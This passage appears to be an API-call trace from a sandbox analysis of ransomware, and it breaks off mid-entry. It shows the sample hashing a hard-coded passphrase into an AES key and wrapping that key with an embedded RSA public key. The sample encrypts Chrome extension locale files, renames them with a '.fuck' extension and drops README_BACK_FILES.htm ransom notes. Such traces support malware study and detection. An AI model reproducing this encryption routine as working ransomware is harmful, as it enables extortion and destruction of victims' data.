returned 1 [0260.149] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.149] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.149] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.149] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.150] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.150] GetLastError () returned 0x0 [0260.150] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json")) returned 0x20 [0260.150] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json", dwFileAttributes=0x80) returned 1 [0260.150] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.151] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.152] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.153] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6e428) returned 1 [0260.155] CryptCreateHash (in: hProv=0x2e6e428, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.155] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.155] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb558, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.155] CryptDeriveKey (in: hProv=0x2e6e428, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7ce40) returned 1 [0260.155] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.155] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.155] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6e4b0) returned 1 [0260.156] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6e4b0, dwCertEncodingType=0x1, pInfo=0x2eb23c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb23f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb23f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7cf40) returned 1 [0260.156] CryptEncrypt (in: hKey=0x2e7cf40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.156] CryptEncrypt (in: hKey=0x2e7cf40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6e538*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6e538*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.156] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6e538*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6e538*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.157] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xec, lpOverlapped=0x0) returned 1 [0260.158] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xec, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0260.158] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0260.159] CloseHandle (hObject=0x5d64) returned 1 [0260.159] CloseHandle (hObject=0x5d5c) returned 1 [0260.159] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json"), bFailIfExists=0) returned 1 [0260.162] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json", dwFileAttributes=0x0) returned 1 [0260.162] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.gsg")) returned 1 [0260.163] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.fuck")) returned 1 [0260.164] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.165] CryptDestroyKey (hKey=0x2e7ce40) returned 1 [0260.165] CryptReleaseContext (hProv=0x2e6e428, dwFlags=0x0) returned 1 [0260.165] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.165] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.165] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\readme_back_files.htm")) returned 0xffffffff [0260.165] AreFileApisANSI () returned 1 [0260.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3508, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.165] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.166] GetFileType (hFile=0x5d60) returned 0x1 [0260.166] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.166] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.167] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.169] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.170] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.170] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.170] GetLastError () returned 0x0 [0260.170] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json")) returned 0x20 [0260.170] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json", dwFileAttributes=0x80) returned 1 [0260.170] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.171] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.172] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.172] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.174] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.174] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.174] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.174] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7cf00) returned 1 [0260.174] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.174] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.174] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6e428) returned 1 [0260.175] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6e428, dwCertEncodingType=0x1, pInfo=0x2eb2f20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb2f50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb2f58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d080) returned 1 [0260.175] CryptEncrypt (in: hKey=0x2e7d080, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.175] CryptEncrypt (in: hKey=0x2e7d080, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6ec20*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6ec20*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.175] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e6ec20*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6ec20*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.176] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xef, lpOverlapped=0x0) returned 1 [0260.176] CryptEncrypt (in: hKey=0x2e7cf00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xef, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0260.176] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0260.177] CloseHandle (hObject=0x5d5c) returned 1 [0260.177] CloseHandle (hObject=0x5d64) returned 1 [0260.177] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json"), bFailIfExists=0) returned 1 [0260.179] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json", dwFileAttributes=0x0) returned 1 [0260.180] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.gsg")) returned 1 [0260.181] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.fuck")) returned 1 [0260.183] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.183] CryptDestroyKey (hKey=0x2e7cf00) returned 1 [0260.183] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.183] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.183] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.183] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\readme_back_files.htm")) returned 0xffffffff [0260.183] AreFileApisANSI () returned 1 [0260.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.183] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.184] GetFileType (hFile=0x5d60) returned 0x1 [0260.184] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.188] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.188] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.189] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.189] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.189] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.189] GetLastError () returned 0x0 [0260.189] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json")) returned 0x20 [0260.190] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json", dwFileAttributes=0x80) returned 1 [0260.191] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.192] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.193] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.194] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.196] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.196] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.196] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.196] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7cf00) returned 1 [0260.196] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC 